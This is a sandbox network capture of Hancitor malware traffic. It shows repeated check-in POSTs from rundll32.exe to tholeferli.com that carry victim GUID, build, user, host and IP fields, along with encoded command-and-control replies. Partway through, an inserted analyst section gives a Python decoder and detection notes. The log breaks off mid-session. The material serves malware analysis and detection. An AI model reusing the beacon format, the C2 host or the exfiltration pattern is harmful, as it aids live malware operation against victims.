                                                Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nZYBAARRABw==\r\n0\r\n\r\n


                                                Session ID: 170 | Source IP: 192.168.2.22 | Source Port: 49337 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:30.087830067 CEST | 486 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:30.242813110 CEST | 486 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nHJQSARRABw==\r\n0\r\n\r\n


                                                Session ID: 171 | Source IP: 192.168.2.22 | Source Port: 49338 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:30.519759893 CEST | 487 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:30.688602924 CEST | 487 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nCGTXARRABw==\r\n0\r\n\r\n


                                                Session ID: 172 | Source IP: 192.168.2.22 | Source Port: 49339 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:30.951530933 CEST | 488 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:31.118262053 CEST | 488 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nJNMQARRABw==\r\n0\r\n\r\n


                                                Session ID: 173 | Source IP: 192.168.2.22 | Source Port: 49340 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:31.378842115 CEST | 489 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:31.535861015 CEST | 489 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:31 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nHTGSARRABw==\r\n0\r\n\r\n


                                                Session ID: 174 | Source IP: 192.168.2.22 | Source Port: 49341 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:31.825335979 CEST | 490 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:31.982024908 CEST | 491 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:31 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nFBYUARRABw==\r\n0\r\n\r\n


                                                Session ID: 175 | Source IP: 192.168.2.22 | Source Port: 49342 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:32.249089956 CEST | 491 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:32.406642914 CEST | 492 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:32 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nMKPNARRABw==\r\n0\r\n\r\n


                                                Session ID: 176 | Source IP: 192.168.2.22 | Source Port: 49343 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:32.689807892 CEST | 493 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:32.846988916 CEST | 493 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:32 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQZAJARRABw==0
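The sessions above are the same Hancitor check-in repeated once per second: a form-encoded POST to /8/forum.php and a one-chunk reply whose visible body is a short base64 string. The following is an added example for this report, not code from the sandbox or from the malware; it takes the request and response bodies of session 176 from the "Data Raw" lines above and decodes them. Two things it relies on are assumptions, not facts stated on this page: that the reply is base64 followed by a single-byte XOR with 0x7A, as public Hancitor write-ups describe (kept as a parameter), and that commands in the decoded reply take the form `{letter:argument}`. One caveat the raw bytes expose: the sandbox's "Data Ascii" rendering redacts the host\user part of INFO=, so the body it prints is 106 bytes, while the hex is what was actually sent and matches the request's Content-Length of 110.

```python
"""Decode one Hancitor beacon/response pair captured in this report (session 176).

Added example for the report; not the sandbox's or the malware author's code.
Assumption: the C2 reply is base64 followed by a single-byte XOR with 0x7A, as
public Hancitor analyses describe. The key is a parameter so a differing build
can be tried quickly; the decoded bytes are returned so the reader can judge.
"""
import base64
import re
from urllib.parse import parse_qsl

# Sample input: request and response bodies of session 176, copied from the
# "Data Raw" lines of this report (hex exactly as the sandbox printed it).
REQUEST_BODY_HEX = (
    "47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 "
    "26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d "
    "39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 "
    "45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d "
    "31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29"
)
DECLARED_CONTENT_LENGTH = 110  # Content-Length header of the same request
RESPONSE_BODY_HEX = "63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"

HANCITOR_XOR_KEY = 0x7A  # assumption, see module docstring
# Assumed command grammar: one letter, a colon, an argument, inside braces.
COMMAND_RE = re.compile(rb"\{([a-z]):([^}]*)\}")


def parse_beacon(body: bytes, declared_length: int) -> dict:
    """Split the x-www-form-urlencoded check-in into its fields.

    Raises ValueError when the body does not match the declared Content-Length,
    which catches a truncated or redacted capture before its fields are trusted.
    """
    if len(body) != declared_length:
        raise ValueError(f"body is {len(body)} bytes, header says {declared_length}")
    # keep_blank_values keeps the empty EXT= field; the body has no %-escapes.
    return dict(parse_qsl(body.decode("ascii"), keep_blank_values=True))


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out = bytearray()
    pos = 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)  # drop any chunk extension
        pos = end + 2
        if size == 0:
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def decode_response(chunked: bytes, key: int = HANCITOR_XOR_KEY) -> tuple:
    """Dechunk, base64-decode and XOR the C2 reply.

    Returns (plaintext bytes, list of (command letter, argument) pairs).
    """
    plain = bytes(b ^ key for b in base64.b64decode(dechunk(chunked)))
    commands = [(c.decode(), a.decode(errors="replace"))
                for c, a in COMMAND_RE.findall(plain)]
    return plain, commands


def analyse_session_176() -> dict:
    """Run both decoders over the session 176 bytes embedded above."""
    fields = parse_beacon(bytes.fromhex(REQUEST_BODY_HEX), DECLARED_CONTENT_LENGTH)
    plain, commands = decode_response(bytes.fromhex(RESPONSE_BODY_HEX))
    return {"fields": fields, "plain": plain, "commands": commands}


if __name__ == "__main__":
    result = analyse_session_176()
    for name, value in result["fields"].items():
        print(f"{name:5} = {value}")
    print("decoded reply:", result["plain"])
    print("commands     :", result["commands"])
```

Under the assumed key the reply decodes to three non-printable bytes followed by `{n:}`, and every reply in this section ends in the same `ARRABw==` tail, so the C2 is answering each beacon with an empty command and only the three-byte prefix changes. The six fixed beacon keys (GUID, BUILD, INFO, EXT, IP, TYPE, WIN) together with the static Trident User-Agent and the `/<digit>/forum.php` path are what a network signature for this traffic should key on; the TYPE=1 and WIN=6.1(x64) values are constant across all sessions shown.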


                                                Session ID: 177 | Source: 192.168.2.22:49344 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:33.128132105 CEST | 494 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:33.296606064 CEST | 494 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:33 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCHSXARRABw==0


                                                Session ID: 178 | Source: 192.168.2.22:49345 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:33.578170061 CEST | 495 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:33.747662067 CEST | 495 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:33 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVKPEARRABw==0


                                                Session ID: 179 | Source: 192.168.2.22:49346 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:34.034382105 CEST | 496 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:34.205979109 CEST | 496 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:34 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQFUJARRABw==0


                                                Session ID: 18 | Source: 192.168.2.22:49185 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:10.984551907 CEST | 315 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:11.153819084 CEST | 315 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:11 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 51 4a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQQJJARRABw==0


                                                Session ID: 180 | Source: 192.168.2.22:49347 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:34.498697042 CEST | 497 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:34.654334068 CEST | 497 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:34 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 47 54 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZGTAARRABw==0


                                                Session ID: 181 | Source: 192.168.2.22:49348 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:34.935930967 CEST | 498 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:35.091860056 CEST | 498 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:34 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBZAYARRABw==0


                                                Session ID: 182 | Source: 192.168.2.22:49349 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:35.416528940 CEST | 499 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:35.574692965 CEST | 500 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:35 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 5a 41 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJZAQARRABw==0


                                                Session ID: 183 | Source: 192.168.2.22:49350 | Destination: 194.147.115.74:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:35.860683918 CEST | 500 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
